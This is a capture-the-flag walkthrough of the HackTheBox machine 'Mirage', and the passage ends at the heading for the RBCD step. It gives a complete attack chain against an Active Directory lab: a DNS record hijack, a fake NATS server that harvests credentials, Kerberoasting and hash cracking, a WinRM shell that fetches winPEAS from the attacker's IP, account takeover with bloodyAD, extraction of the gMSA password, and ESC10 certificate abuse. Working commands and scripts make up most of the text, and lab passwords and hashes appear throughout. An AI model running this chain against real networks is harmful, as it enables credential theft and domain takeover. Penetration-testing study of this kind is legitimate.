HTB Season 8 Box - Mirage
nmap scan
nmap -F -A 10.129.108.73
nmap -p- --min-rate 1000 -T4 10.129.108.73 -oA nmapfullscan
nmap -p- --min-rate 1000 -T4 10.129.108.73 -sU -oA nmapfullscanUDP

Output of the -F -A scan:
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-21 08:02:38Z)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after: 2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
2049/tcp open nlockmgr 1-4 (RPC #100021)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=7/20%OT=53%CT=7%CU=30807%PV=Y%DS=2%DC=T%G=Y%TM=687D
OS:92ED%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=106%TI=I%CI=I%II=I%SS=S%
OS:TS=A)SEQ(SP=105%GCD=1%ISR=107%TI=I%CI=I%II=I%SS=S%TS=A)SEQ(SP=107%GCD=1%
OS:ISR=109%TI=I%CI=I%II=I%SS=S%TS=A)SEQ(SP=108%GCD=1%ISR=109%TI=I%CI=I%II=I
OS:%SS=S%TS=A)OPS(O1=M542NW8ST11%O2=M542NW8ST11%O3=M542NW8NNT11%O4=M542NW8S
OS:T11%O5=M542NW8ST11%O6=M542ST11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FF
OS:FF%W6=FFDC)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M542NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=8
OS:0%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(
OS:R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F
OS:=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%
OS:T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD
OS:=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE
OS:(R=Y%DFI=N%T=80%CD=Z)
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Output of the full TCP port scan:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-20 21:05 EDT
Warning: 10.129.108.73 giving up on port because retransmission cap hit (6).
Stats: 0:01:32 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 95.52% done; ETC: 21:06 (0:00:04 remaining)
Nmap scan report for 10.129.108.73
Host is up (0.41s latency).
Not shown: 65505 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
111/tcp open rpcbind
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
2049/tcp open nfs
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
4222/tcp open vrml-multi-use
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49669/tcp open unknown
60842/tcp open unknown
60853/tcp open unknown
60854/tcp open unknown
60871/tcp open unknown
63461/tcp open unknown
63488/tcp open unknown
63609/tcp open unknown
63628/tcp open unknown
NFS enumeration & mount
The scan shows NFS (rpcbind on 111, nfs on 2049), so we look there first.
showmount -e 10.129.108.73
sudo mount -t nfs 10.129.108.73:'/MirageReports' '/home/kali/Desktop/HTB/mirage/nfs' -o nolock
qpdf: stripping the PDF restrictions
The share holds two PDF files; we copy them all out.
# Don't use cp -a: we have no way to reproduce the source ownership/permission settings locally anyway
┌──(kali㉿kali)-[~/Desktop/HTB/mirage/nfs]
└─$ sudo cp * ../
# Rewrite the PDF with qpdf to get rid of its restrictions (if they survive the rewrite, add --decrypt, which drops the owner-password protection)
sudo qpdf Incident_Report_Missing_DNS_Record_nats-svc.pdf test.pdf
The report mentions a hostname, so we go and look at that machine:
nats-svc.mirage.htb
The same report says the domain is retiring NTLM authentication entirely in favour of Kerberos (hence the -k on every tool below).
Querying the name against the DC's DNS returns NXDOMAIN: the record no longer exists, so we may be able to register it ourselves and hijack the name.
└─$ dig nats-svc.mirage.htb @10.129.108.73

; <<>> DiG 9.20.2-1-Debian <<>> nats-svc.mirage.htb @10.129.108.73
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 26492
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;nats-svc.mirage.htb. IN A

;; AUTHORITY SECTION:
mirage.htb. 3600 IN SOA dc01.mirage.htb. hostmaster.mirage.htb. 156 900 600 86400 3600

;; Query time: 360 msec
;; SERVER: 10.129.108.73#53(10.129.108.73) (UDP)
;; WHEN: Sun Jul 20 21:34:30 EDT 2025
;; MSG SIZE rcvd: 110
nsupdate: adding the DNS record
The report describes nats-svc as a critical system that other hosts talk to constantly, so if we register its name pointing at our host we sit in the middle and can probably capture something interesting. Note that the unauthenticated nsupdate below is accepted: the AD-integrated zone allows non-secure dynamic updates (the default for AD-integrated zones is "Secure only", which requires a Kerberos-authenticated GSS-TSIG update).
┌──(kali㉿kali)-[~/Desktop/HTB/mirage]
└─$ nsupdate
> server 10.129.108.73
> update add nats-svc.mirage.htb 3600 A 10.10.16.2
> send
Fake NATS server
Once the record resolves to us, we use a fake NATS server generated with GPT:
import socket
import threading

HOST = '0.0.0.0'
PORT = 4222  # default NATS port


def handle_client(conn, addr):
    print(f"[+] Connection from {addr}")
    # Send a forged INFO line that follows the NATS protocol spec so the client proceeds
    info = ('INFO {"server_id":"FAKE123","version":"2.9.9","proto":1,'
            '"go":"go1.20.0","host":"fake-nats","port":4222,"max_payload":1048576}\r\n')
    conn.send(info.encode())
    try:
        while True:
            data = conn.recv(4096)
            if not data:
                break
            # A real client answers INFO with "CONNECT {...}", which carries its
            # user/pass (or token) in cleartext when TLS is not required
            print(f"[DATA] {addr} >>> {data.decode(errors='ignore')}")
    except Exception as e:
        print(f"[!] Error from {addr}: {e}")
    finally:
        conn.close()
        print(f"[-] Connection closed: {addr}")


def start_server():
    print(f"[*] Starting fake NATS server on {HOST}:{PORT}")
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)  # allow quick restarts
        s.bind((HOST, PORT))
        s.listen()
        while True:
            conn, addr = s.accept()
            thread = threading.Thread(target=handle_client, args=(conn, addr))
            thread.start()


if __name__ == '__main__':
    start_server()
Start the server
python fake_nats.py
GPT really did think of everything: the client connects to us and hands over a set of credentials.
Dev_Account_A/hx5h7F5554fP@1337!
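The fake server above only dumps raw bytes. The added example below (not part of the original write-up or of any NATS project code) shows what actually arrives on the wire and how to pull the credentials out of it reliably: the client answers INFO with a single `CONNECT {json}` line that carries `user`/`pass`, an `auth_token`, or an NKey `jwt`/`sig` in cleartext whenever `tls_required` is false, followed by `PING` and its `SUB` lines. The capture, the client name and the credentials in `SAMPLE_CAPTURE` are constructed placeholders, not the values recovered on the box.

```python
import json
import re
from typing import List, Optional

# Constructed sample of a NATS client's first bytes after it receives INFO.
# Credentials and client name are placeholders (assumption: a user/pass client).
SAMPLE_CAPTURE = (
    b'CONNECT {"verbose":false,"pedantic":false,"tls_required":false,'
    b'"name":"nats-svc-client","lang":"go","version":"1.30.0","protocol":1,'
    b'"user":"example_user","pass":"example_pass"}\r\n'
    b'PING\r\n'
    b'SUB auth_logs 1\r\n'
)


def split_protocol_lines(buf: bytes):
    """Yield the CRLF-terminated control lines (CONNECT/PING/SUB/...).

    PUB payloads would need length-aware parsing; the handshake only has
    control lines, which is all a credential-harvesting listener cares about.
    """
    for raw in buf.split(b'\r\n'):
        if raw:
            yield raw.decode('utf-8', errors='replace')


def parse_connect(line: str) -> Optional[dict]:
    """Return the JSON options of a CONNECT line, or None for any other line."""
    m = re.match(r'^CONNECT\s+(\{.*\})\s*$', line, re.DOTALL)
    if not m:
        return None
    return json.loads(m.group(1))


def extract_credentials(buf: bytes) -> dict:
    """Collect every credential-bearing CONNECT field plus the subjects subscribed.

    NATS accepts user/pass, auth_token, or jwt+sig (NKeys); whichever the client
    uses is sent in the clear unless tls_required is true.
    """
    result = {'tls_required': None, 'user': None, 'pass': None,
              'auth_token': None, 'jwt': None, 'sig': None, 'subjects': []}
    for line in split_protocol_lines(buf):
        opts = parse_connect(line)
        if opts is not None:
            for key in ('tls_required', 'user', 'pass', 'auth_token', 'jwt', 'sig'):
                result[key] = opts.get(key)
        elif line.startswith('SUB '):
            # SUB <subject> [queue] <sid>: the subjects tell us what the client wants
            result['subjects'].append(line.split()[1])
    return result


def server_replies(buf: bytes) -> List[str]:
    """Minimal replies a rogue server must send to keep the client talking:
    +OK after CONNECT only when verbose is set, PONG for every PING."""
    replies = []
    for line in split_protocol_lines(buf):
        opts = parse_connect(line)
        if opts is not None and opts.get('verbose'):
            replies.append('+OK\r\n')
        elif line == 'PING':
            replies.append('PONG\r\n')
    return replies


if __name__ == '__main__':
    print(extract_credentials(SAMPLE_CAPTURE))
    print(server_replies(SAMPLE_CAPTURE))
```

The defensive reading is the same: a NATS deployment that lets clients connect with `tls_required` false and plain `user`/`pass` leaks the service account to anyone who can answer for the server's DNS name, which is exactly what the stale record made possible here.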
NATS exploit
NATS is a subject-based messaging system: publishers send to a subject and the server fans the messages out to subscribers. Using the recovered credentials we enumerate the server and find a JetStream stream named auth_logs; anything holding authentication logs is interesting, so we create a pull consumer on it and replay its retained history with the commands below.
# Save the credentials as a local nats context
natscli --user='Dev_Account_A' --password='hx5h7F5554fP@1337!' --server nats://dc01.mirage.htb:4222 context add dev-nats
# Subscribe to every subject (">" is the full wildcard) to see what flows live
natscli --context dev-nats sub ">" --count 10
# Create a durable pull consumer with explicit acks on the auth_logs stream
natscli --context dev-nats consumer add auth_logs audit-reader --pull --ack=explicit
# Pull the stored messages from the stream
natscli --context dev-nats consumer next auth_logs audit-reader --count=5 --wait=5s --ack
The replayed log entries give us the user david.jjackson:
david.jjackson/pN8kQmn6b86!1234@
A quick LDAP check confirms it is a domain account. Excellent: we move on to the domain itself.
nxc ldap dc01.mirage.htb -u david.jjackson -p 'pN8kQmn6b86!1234@' -k
BloodHound: collecting the domain graph
bloodhound-python -d mirage.htb -dc dc01.mirage.htb -c All -u david.jjackson -p 'pN8kQmn6b86!1234@' --dns-timeout 10 -k
godap: browsing the domain details
./godap 10.129.108.73 -u david.jjackson -p 'pN8kQmn6b86!1234@' -d mirage.htb
After reviewing the graph, david.jjackson holds nothing especially privileged.
impacket-GetUserSPNs: Kerberoasting the SPN-bearing users
impacket-GetUserSPNs mirage.htb/david.jjackson:'pN8kQmn6b86!1234@' -target-domain mirage.htb -save -debug -dc-ip 10.129.108.73 -request -dc-host dc01.mirage.htb -k
Cracking with hashcat
We obtain a TGS hash for the user nathan.aadam and crack it offline (mode 13100 = Kerberos 5 TGS-REP etype 23).
hashcat -a 0 -m 13100 hash/nathan.aadam /home/kali/Desktop/Info/zhuzhuzxia/Passwords/rockyou.txt
nathan.aadam:'3edc#EDC3'
Logging in with evil-winrm
The graph shows nathan.aadam is far more interesting: a member of IT_admin, exchange_admin and the remote management group, so we can dig further on SMB, Exchange and DC01 itself.
# Get a TGT (evil-winrm -r obtains the HTTP service ticket itself; it needs the MIRAGE.HTB realm configured in /etc/krb5.conf)
impacket-getTGT mirage.htb/nathan.aadam:'3edc#EDC3' -dc-ip 10.129.108.73 -debug
# Lateral movement with the ticket
export KRB5CCNAME=/home/kali/Desktop/HTB/mirage/nathan.aadam.ccache
evil-winrm -i dc01.mirage.htb -r mirage.htb
Uploading winPEAS
From the WinRM shell on DC01 we run local enumeration.
(New-Object Net.WebClient).DownloadFileAsync('http://10.10.16.2/winPEASx64.exe', 'C:\tool\winPEASx64.exe')
winPEAS delivers: AutoLogon credentials
mark.bbond:'1day@atime'
Analysing the domain graph
The graph (figure not reproduced here) shows that mark.bbond can reset javier.mmarshall's password and can also re-enable that account.
It also shows that javier.mmarshall can read a gMSA password (ReadGMSAPassword). A gMSA (group Managed Service Account) is a service account whose password is generated and rotated automatically by the domain controller; such accounts usually run privileged services. We start the attack chain.
bloodyAD: enabling the account & resetting its password
# Get a TGT
impacket-getTGT mirage.htb/mark.bbond:'1day@atime' -dc-ip 10.129.108.73
# bloodyAD: clear the ACCOUNTDISABLE flag on the disabled user
export KRB5CCNAME=mark.bbond.ccache
bloodyAD -k --host dc01.mirage.htb -d mirage.htb -u mark.bbond -p '1day@atime' --dc-ip 10.129.108.73 remove uac javier.mmarshall -f ACCOUNTDISABLE
# bloodyAD: reset the password
bloodyAD -k --host dc01.mirage.htb -d mirage.htb -u mark.bbond -p '1day@atime' --dc-ip 10.129.108.73 set password javier.mmarshall '1ydx@atime'
ldapmodify: setting logonHours - unlocking the account
The account is still blocked by a logonHours restriction (no permitted logon hours), so we overwrite the attribute with "all hours allowed". logonHours is a 21-byte bitmap (168 bits, one per hour of the week); 21 bytes of 0xFF base64-encode to the 28 slashes below.
ldapmodify -H ldap://10.129.108.73 -D "mark.bbond@mirage.htb" -w '1day@atime' -f logonhours.ldif
# logonhours.ldif
dn: CN=javier.mmarshall,OU=Users,OU=Disabled,DC=mirage,DC=htb
changetype: modify
replace: logonHours
logonHours:: ////////////////////////////
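Where the odd-looking `////////////////////////////` value comes from, and how to read the attribute back when auditing an account, as an added example that is not part of the original write-up. It builds and decodes the logonHours bitmap following the attribute's documented layout (bit n = day*24 + hour, bits packed least-significant first within each byte, hours counted in UTC from Sunday 00:00); the GUI shifts the display into the DC's time zone, which this example deliberately does not do. The "business hours" schedule is a constructed policy used only to show a restricted bitmap.

```python
import base64
from typing import Dict, Iterable, List, Tuple

DAYS = ['Sun', 'Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat']


def encode_logon_hours(allowed: Iterable[Tuple[int, int]]) -> bytes:
    """Build the 21-byte logonHours bitmap from (day_index, hour) pairs.

    Bit n (n = day*24 + hour, day 0 = Sunday, hours in UTC) is set when logon
    is permitted in that hour; bits are packed LSB-first inside each byte.
    """
    bitmap = bytearray(21)
    for day, hour in allowed:
        if not (0 <= day < 7 and 0 <= hour < 24):
            raise ValueError(f'bad (day, hour): {(day, hour)}')
        n = day * 24 + hour
        bitmap[n // 8] |= 1 << (n % 8)
    return bytes(bitmap)


def decode_logon_hours(bitmap: bytes) -> Dict[str, List[int]]:
    """Inverse of encode_logon_hours: day name -> sorted list of permitted hours."""
    if len(bitmap) != 21:
        raise ValueError(f'logonHours must be 21 bytes, got {len(bitmap)}')
    schedule: Dict[str, List[int]] = {d: [] for d in DAYS}
    for n in range(168):
        if (bitmap[n // 8] >> (n % 8)) & 1:
            schedule[DAYS[n // 24]].append(n % 24)
    return schedule


def to_ldif_value(bitmap: bytes) -> str:
    """Base64 text that follows the double colon in an LDIF 'logonHours::' line."""
    return base64.b64encode(bitmap).decode('ascii')


def from_ldif_value(value: str) -> bytes:
    return base64.b64decode(value)


def allowed_hour_count(bitmap: bytes) -> int:
    """Number of permitted hours per week; 0 means the account can never log on."""
    return sum(bin(b).count('1') for b in bitmap)


def all_hours() -> List[Tuple[int, int]]:
    return [(d, h) for d in range(7) for h in range(24)]


def business_hours() -> List[Tuple[int, int]]:
    """Constructed example policy: Monday to Friday, 09:00 to 17:59 UTC."""
    return [(d, h) for d in range(1, 6) for h in range(9, 18)]


if __name__ == '__main__':
    full = encode_logon_hours(all_hours())
    print('logonHours::', to_ldif_value(full))      # the value used in logonhours.ldif
    print(decode_logon_hours(encode_logon_hours(business_hours())))
```

Run the decoder against a dumped attribute before touching it: an all-zero bitmap is the "locked out at every hour" state this step is undoing, while a partially filled one is a deliberate policy that an attacker overwriting it to all-ones would visibly break.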
nxc & bloodyAD: reading the gMSA password
# Get a TGT
impacket-getTGT mirage.htb/javier.mmarshall:'1ydx@atime' -dc-ip 10.129.108.73
# nxc reads msDS-ManagedPassword and prints the NT hash derived from it (the DC only returns this attribute over a sealed or LDAPS connection, which the Kerberos bind provides)
nxc ldap 10.129.108.73 -u javier.mmarshall -p '1ydx@atime' --gmsa -k -d mirage.htb --kdcHost dc01.mirage.htb
# bloodyAD reads the same attribute
bloodyAD -k --host dc01.mirage.htb -d 'mirage.htb' -u 'javier.mmarshall' -p '1ydx@atime' get object 'Mirage-Service$' --attr msDS-ManagedPassword
impacket: TGT for the gMSA using its NT hash
impacket-getTGT mirage.htb/Mirage-Service$ -hashes aad3b435b51404eeaad3b435b51404ee:305806d84f7c1be93a07aaf40f0c7866 -dc-ip 10.129.108.73
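What the `--gmsa` option is doing under the hood, as an added example that is not code from the write-up or from nxc/bloodyAD: the DC returns msDS-ManagedPassword as an MSDS-MANAGEDPASSWORD_BLOB (MS-ADTS 2.2.19), the CurrentPassword field is a null-terminated UTF-16LE string, and the NT hash is simply MD4 over those UTF-16LE bytes, which is the value fed to `getTGT -hashes` above. Because hashlib's MD4 is often missing under OpenSSL 3, the example carries its own RFC 1320 implementation. `SAMPLE_BLOB` is constructed here with the placeholder password "password" so the result is a well-known hash; a real blob holds a 256-byte random password.

```python
import struct
from typing import Optional


def _f(x, y, z): return (x & y) | (~x & z)
def _g(x, y, z): return (x & y) | (x & z) | (y & z)
def _h(x, y, z): return x ^ y ^ z
def _rol(x, n): return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); NT hashes are MD4 of the UTF-16LE password."""
    msg = bytearray(data) + b'\x80'
    while len(msg) % 64 != 56:
        msg += b'\x00'
    msg += struct.pack('<Q', len(data) * 8)
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack('<16I', msg[off:off + 64])
        a, b, c, d = A, B, C, D
        for i in range(16):  # round 1: F, message words in order
            a, b, c, d = d, _rol((a + _f(b, c, d) + X[i]) & 0xFFFFFFFF, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2: G, words 0,4,8,12,1,5,...
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, _rol((a + _g(b, c, d) + X[k] + 0x5A827999) & 0xFFFFFFFF, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3: H, words 0,8,4,12,2,10,...
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a, b, c, d = d, _rol((a + _h(b, c, d) + X[k] + 0x6ED9EBA1) & 0xFFFFFFFF, (3, 9, 11, 15)[i % 4]), b, c
        A, B, C, D = ((A + a) & 0xFFFFFFFF, (B + b) & 0xFFFFFFFF,
                      (C + c) & 0xFFFFFFFF, (D + d) & 0xFFFFFFFF)
    return struct.pack('<4I', A, B, C, D)


def nt_hash(password_utf16le: bytes) -> str:
    return md4(password_utf16le).hex()


def build_managed_password_blob(current: str, previous: Optional[str] = None,
                                query_interval_100ns: int = 0,
                                unchanged_interval_100ns: int = 0) -> bytes:
    """Constructed MSDS-MANAGEDPASSWORD_BLOB for the demo (layout per MS-ADTS 2.2.19).

    Header: Version(2) Reserved(2) Length(4) CurrentPasswordOffset(2)
    PreviousPasswordOffset(2) QueryPasswordIntervalOffset(2) UnchangedPasswordIntervalOffset(2),
    then the null-terminated UTF-16LE passwords, alignment padding and two 64-bit intervals.
    """
    cur = current.encode('utf-16-le') + b'\x00\x00'
    prev = (previous.encode('utf-16-le') + b'\x00\x00') if previous else b''
    cur_off = 16
    prev_off = cur_off + len(cur) if previous else 0
    body_end = cur_off + len(cur) + len(prev)
    pad = (-body_end) % 8                      # AlignmentPadding to an 8-byte boundary
    qpi_off = body_end + pad
    upi_off = qpi_off + 8
    total = upi_off + 8
    header = struct.pack('<HHIHHHH', 1, 0, total, cur_off, prev_off, qpi_off, upi_off)
    return header + cur + prev + b'\x00' * pad + struct.pack('<QQ', query_interval_100ns, unchanged_interval_100ns)


def parse_managed_password_blob(blob: bytes) -> dict:
    """Decode the blob the DC returns in msDS-ManagedPassword."""
    version, _reserved, length, cur_off, prev_off, qpi_off, upi_off = struct.unpack_from('<HHIHHHH', blob, 0)
    if version != 1 or length != len(blob):
        raise ValueError('not a valid MSDS-MANAGEDPASSWORD_BLOB')

    def wstr(off: int) -> bytes:
        # Walk in 2-byte code units so a stray 0x00 byte inside a character is not a terminator
        end = off
        while blob[end:end + 2] != b'\x00\x00':
            end += 2
        return blob[off:end]

    return {
        'current_password': wstr(cur_off),                              # raw UTF-16LE bytes
        'previous_password': wstr(prev_off) if prev_off else None,
        'query_password_interval': struct.unpack_from('<Q', blob, qpi_off)[0],     # 100 ns units
        'unchanged_password_interval': struct.unpack_from('<Q', blob, upi_off)[0],
    }


def gmsa_nt_hash(blob: bytes) -> str:
    """The value tools print for a gMSA: NT hash of CurrentPassword, usable with getTGT -hashes."""
    return nt_hash(parse_managed_password_blob(blob)['current_password'])


# Constructed sample: placeholder password, not the real Mirage-Service$ secret
SAMPLE_BLOB = build_managed_password_blob('password', query_interval_100ns=36000000000)

if __name__ == '__main__':
    print(gmsa_nt_hash(SAMPLE_BLOB))
```

The raw password bytes are kept as bytes on purpose: real gMSA passwords are random UTF-16 code units that frequently do not decode to printable text, which is why every tool hands you the NT hash rather than the password.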
Checking for ESC10
We now hold the NT hash of Mirage-Service$, but that account has no remote logon rights, and a hash alone is not enough for RunasCs to switch identities on the box. Continuing enumeration on DC01 we find the registry state that enables ESC10.
# Schannel certificate mapping methods (ESC10 case 2)
reg query HKLM\System\CurrentControlSet\Control\SecurityProviders\Schannel
# KDC strong certificate binding enforcement (ESC10 case 1)
reg query HKLM\SYSTEM\CurrentControlSet\Services\Kdc
ESC10 is present when StrongCertificateBindingEnforcement is set to 0 (Kerberos certificate logon maps a certificate to an account by UPN alone, without the SID binding), or when CertificateMappingMethods includes the UPN bit (0x4), which makes Schannel (LDAPS) authentication map a certificate purely by its SAN UPN. The LDAP shell used below goes through the Schannel path.
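A small triage helper, added here and not part of the original write-up: it parses the text that `reg query` prints for the two keys above and applies the ESC10 conditions, including the cases a manual reading tends to get wrong, namely a missing CertificateMappingMethods value (Schannel then defaults to 0x18, no UPN mapping) and a missing StrongCertificateBindingEnforcement value (the KDC then uses the OS default, which is non-zero, so case 1 does not apply). `SAMPLE_REG_OUTPUT` is a constructed copy of the `reg query` output format with values chosen to show the vulnerable state; it is not the real output from DC01.

```python
import re
from typing import Dict

# Constructed sample of `reg query` output for both keys (values chosen to illustrate
# the vulnerable state, not copied from the target).
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel
    EventLogging    REG_DWORD    0x1
    CertificateMappingMethods    REG_DWORD    0x4

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc
    StrongCertificateBindingEnforcement    REG_DWORD    0x0
"""

# Schannel CertificateMappingMethods bit flags
MAPPING_FLAGS = {
    0x01: 'Subject/Issuer',
    0x02: 'Issuer',
    0x04: 'UPN',
    0x08: 'S4U2Self',
    0x10: 'S4U2Self explicit',
}
DEFAULT_MAPPING_METHODS = 0x18  # value Schannel uses when the registry entry is absent


def parse_reg_query(text: str) -> Dict[str, Dict[str, int]]:
    """Return {key_path: {value_name: int}} for REG_DWORD/REG_QWORD lines of `reg query` output."""
    result: Dict[str, Dict[str, int]] = {}
    key = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line.startswith((' ', '\t')):          # unindented line = key path
            key = line.strip()
            result.setdefault(key, {})
            continue
        m = re.match(r'\s+(\S+)\s+(REG_DWORD|REG_QWORD)\s+(0x[0-9a-fA-F]+|\d+)', line)
        if m and key is not None:
            result[key][m.group(1)] = int(m.group(3), 0)   # base 0 handles 0x.. and decimal
    return result


def esc10_assessment(reg: Dict[str, Dict[str, int]]) -> dict:
    """Apply the ESC10 conditions to parsed registry data, honouring the defaults for absent values."""
    schannel: Dict[str, int] = {}
    kdc: Dict[str, int] = {}
    for path, values in reg.items():
        low = path.lower()
        if low.endswith('securityproviders\\schannel'):
            schannel = values
        elif low.endswith('services\\kdc'):
            kdc = values
    mapping = schannel.get('CertificateMappingMethods', DEFAULT_MAPPING_METHODS)
    # Absent StrongCertificateBindingEnforcement means the OS default applies, which is not 0
    strong = kdc.get('StrongCertificateBindingEnforcement')
    return {
        'mapping_methods': mapping,
        'mapping_names': [name for bit, name in MAPPING_FLAGS.items() if mapping & bit],
        'strong_certificate_binding': strong,
        'case1_kerberos_weak_binding': strong == 0,
        'case2_schannel_upn_mapping': bool(mapping & 0x04),
    }


if __name__ == '__main__':
    print(esc10_assessment(parse_reg_query(SAMPLE_REG_OUTPUT)))
```

Case 2 is the one exercised below: the certificate is presented over LDAPS, Schannel matches its SAN UPN, and the SID in the certificate's security extension is never consulted.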
To pull off ESC10 we still need an account whose userPrincipalName we can write. Fortunately Mirage-Service$ can modify the userPrincipalName of mark.bbond: it holds WRITE_PROP on the Public-Information property set of the mark.bbond object, and UPN is one of the attributes in that set. We confirm it by resolving the object's security descriptor:
bloodyAD -k --host dc01.mirage.htb -d mirage.htb -u mark.bbond -p '1day@atime' --dc-ip 10.129.108.73 get object mark.bbond --resolve-sd
ESC10 attack
# 1. Set the controlled user's userPrincipalName to the target's implicit UPN (DC01$@mirage.htb)
export KRB5CCNAME=Mirage-Service$.ccache
certipy-ad account update -username Mirage-Service$ -hashes aad3b435b51404eeaad3b435b51404ee:305806d84f7c1be93a07aaf40f0c7866 -k -no-pass -user mark.bbond -upn 'DC01$@mirage.htb' -dc-host dc01.mirage.htb -target-ip 10.129.108.73 -ns 10.129.108.73 -target dc01.mirage.htb
# 2. Request a certificate from the User template as the controlled user; its SAN UPN is now DC01$@mirage.htb
export KRB5CCNAME=mark.bbond.ccache
certipy-ad req -ca 'mirage-DC01-CA' -username mark.bbond -password '1day@atime' -dc-host dc01.mirage.htb -target-ip 10.129.108.73 -ns 10.129.108.73 -target dc01.mirage.htb -k -no-pass
# 3. Restore the original UPN. This step is mandatory: when the certificate is presented, the UPN lookup must land on DC01$ (its implicit sAMAccountName@domain UPN) and not on mark.bbond
export KRB5CCNAME=Mirage-Service$.ccache
certipy-ad account update -username Mirage-Service$ -hashes aad3b435b51404eeaad3b435b51404ee:305806d84f7c1be93a07aaf40f0c7866 -k -no-pass -user mark.bbond -upn 'mark.bbond@mirage.htb' -dc-host dc01.mirage.htb -target-ip 10.129.108.73 -ns 10.129.108.73 -target dc01.mirage.htb
# 4. Authenticate over LDAPS with the certificate (Schannel UPN mapping), get an LDAP shell as DC01$ and configure RBCD on DC01
└─$ certipy-ad auth -pfx dc01.pfx -dc-ip 10.129.108.73 -ns 10.129.108.73 -ldap-shell
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*] SAN UPN: 'DC01$@mirage.htb'
[*] Security Extension SID: 'S-1-5-21-2127163471-3824721834-2568365109-1109'
[*] Connecting to 'ldaps://10.129.108.73:636'
[*] Authenticated to '10.129.108.73' as: 'u:MIRAGE\\DC01$'
Type help for list of commands

# set_rbcd dc01$ nathan.aadam
Found Target DN: CN=DC01,OU=Domain Controllers,DC=mirage,DC=htb
Target SID: S-1-5-21-2127163471-3824721834-2568365109-1000
Found Grantee DN: CN=nathan.aadam,OU=Users,OU=Admins,OU=IT_Staff,DC=mirage,DC=htb
Grantee SID: S-1-5-21-2127163471-3824721834-2568365109-1110
Note the security extension SID in the certificate (RID 1109) is not DC01$'s (RID 1000): Schannel mapped the certificate by UPN alone and ignored the SID, which is exactly the ESC10 weakness.
RBCD attack
